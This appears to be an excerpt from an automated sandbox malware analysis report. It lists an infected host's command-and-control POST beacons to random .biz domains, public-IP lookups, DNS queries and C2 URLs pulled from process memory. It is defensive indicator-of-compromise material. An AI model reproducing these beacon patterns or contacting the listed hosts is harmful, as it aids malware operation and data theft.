Source: global traffic	HTTP traffic detected: POST /ydgyvfihkfuxmwlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vcdhvtdni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pjpssoyxmlc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pcyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kwsxhlpkribwfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lutwptrdxtxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fncvigkebkn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xpqdcslnor?usid=27&utid=10221865676 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /ewl?usid=27&utid=10221865931 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /m?usid=27&utid=10221880067 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /mt?usid=27&utid=10221880299 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz

Source: unknown

HTTP traffic detected: POST /haobwbcukjixe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: officesvcmgr.exe.11.dr	String found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
Source: alg.exe, 0000000B.00000003.2334108033.000000000059C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.0000000000562000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/
Source: alg.exe, 0000000B.00000003.2334108033.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/3
Source: alg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/kcogybxqholgdpl
Source: alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/kcogybxqholgdpl0u0umF
Source: alg.exe, 0000000B.00000003.2334108033.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/s
Source: alg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/kcogybxqholgdplrobat
Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.13.20/ydgyvfihkfuxmwlxiG
Source: zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/snkwxvqngvs_
Source: alg.exe, 0000000B.00000003.1769440706.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/mmfoish
Source: alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/
Source: alg.exe, 0000000B.00000003.2521205367.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/gs
Source: alg.exe, 0000000B.00000003.2521205367.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/kwsxhlpkribwfg
Source: alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/kwsxhlpkribwfgiG
Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/067O
Source: alg.exe, 0000000B.00000003.2509027263.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/3
Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/gs
Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/mblybww
Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/pW
Source: alg.exe, 0000000B.00000003.2508497113.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/pcyu
Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/pjpssoyxmlc
Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/rbdfcj
Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/rbdfcjngs3
Source: alg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/s
Source: alg.exe, 0000000B.00000003.2509027263.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225:80/pcyutdnis
Source: alg.exe, 0000000B.00000003.2509027263.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225:80/pjpssoyxmlc
Source: alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225:80/rbdfcjs
Source: alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/
